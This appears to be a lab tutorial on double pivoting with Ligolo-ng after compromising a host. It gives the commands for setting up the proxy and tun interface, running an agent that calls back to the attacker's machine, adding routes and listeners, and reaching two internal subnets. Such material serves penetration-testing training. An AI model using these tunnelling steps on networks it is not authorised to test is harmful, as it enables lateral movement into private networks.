Scenario
In this scenario, we assume that we have successfully compromised the target machine, and our objective is to establish accessibility to the internal network from our own Kali VM
In this scenario, our attacker machine is assigned the IP address 10.10.16.38, and the target machine (pivot machine) is located at 10.129.214.109 and two internal machine 172.16.5.35 and 172.16.6.25. Assuming that we have successfully compromised the target machine, allowing us to initiate double pivoting. With double pivoting, we gain access to both internal machines within the internal network, enabling us to explore and interact with them from our attacker machine
Note: If you are a visual learner I would recommend this YouTube video I found very helpful :)
Setup Ligolo-ng
Prior to utilizing Lingo-ng, it is essential to configure the setup by obtaining two executable files.
The first file is the PROXY, which functions as a C2 (Command and Control) server responsible for managing the connected pivot machines and facilitating tunneling operations.
The second file is the AGENT, which acts as a client-server that establishes a connection through the proxy server. The AGENT enables communication and interaction with the compromised machine.
Downloading and setting up the Proxy into our own Kali machine
1
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz
Extracting The file
1
tar -xvf ligolo-ng_proxy_0.4.3_Linux_64bit.tar.
Adding the ligolo interface
1
2
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
We have successfully setup the ligolo interface
Using Ligolo-ng
./proxy -h for help
To initiate the proxy and enable self-certification, use the command -selfcert. This command will start the proxy and make it listen on the default port 11601. However, if you wish to specify a different listener port, you can use the command ./proxy -selfcert -laddr 0.0.0.0:1234, where 1234 represents the desired listener port. By executing this command, the proxy will begin listening on all network interfaces (0.0.0.0) on the specified port (1234 in this example).
Transfer the agent file into the Target machine, chmod +x agent for making it executable
1
./agent -connect 10.10.16.38:11601 -ignore-cert
Agent Binding/Listening
Now, let’s switch back to our own machine where the proxy server is running. Please note that it may take a few minutes for the connection to establish. As we monitor the proxy server, we can observe that our target machine has successfully joined and established a connection.
To Enter into the session Type session select the session,verify the network connectivity of the host, please open a session and execute the command ifconfig. By examining the output, we can observe that the host is connected to the internal network through Interface 2
In order to make the Internal Network accessible from our host machine, we need to add the Internal IP subnet to our IP route table. This can be achieved by configuring the route table on our host machine to include the Internal IP subnet, allowing for proper routing and communication with the Internal Network
1
2
sudo ip route add 172.16.5/24 dev ligolo
ip route
On the Proxy server, in the current session, execute the command start to initiate tunneling.
As a result, we gain the capability to interact with and access the resources within the Internal Network from our Kali VM.
Now imagine we somehow got the reverse shell on the Internal 1 machine i.e windows host (172.16.5.35), the two IP addresses on Eth0 and Eth2 belong to the same subnet, but they are distinct host addresses within that subnet, this windows host has access to the 172.16.6 subnet However, if we want to enumerate the machines specifically within the 172.16.6.0/24 subnet from our own Kali VM, we need to add an additional IP route to the routing table
To proceed, we need to transfer the agent file to the Windows host. Please ensure that you use the appropriate file for Windows, which is agent.exe. Once the file has been transferred successfully, execute the agent.exe file on the Windows host.
Firstly, we need to add an additional listener on the proxy server. This listener will facilitate the connection between the internal machine and the proxy server.
By executing the command listener_add –addr 172.16.5.15:4455 –to 127.0.0.1:11601, we configure a listener on the proxy server. This listener is set to redirect any requests made to the Target Machine at IP address 172.16.5.15 on port 4455 to our local host machine, specifically to port 11601 where our proxy server is running In essence, this configuration allows us to intercept and redirect incoming requests from the Target Machine to our own proxy server
We will send an agent request to the specified listener address, which corresponds to the IP address (172.16.5.15) Eth0 and port 4455 i.e our Internal-1 Machine . This agent request will be directed towards our own localhost machine, specifically to port 11601, where our proxy server is running. This redirection enables us to establish a connection between the compromised machine and our proxy server, facilitating monitoring and control of the compromised machine’s activities.
Agent Joined
To select the appropriate session, type session and choose from the available sessions. Since we have two sessions to choose from, we can select the desired session that corresponds to the target machine or the internal network we want to interact with
Now, let’s add the IP range 172.16.6.0/24 to our IP table. By including this IP range in our table, we ensure that our system can communicate with and access the machines within the 172.16.6 subnet.
1
2
sudo ip route add 172.16.6/24 dev ligolo
ip route
Type start to start the tunnel
This means that we have the capability to establish connections, interact with, and gather information from the machines residing within the specified subnet (172.16.6) using our Kali VM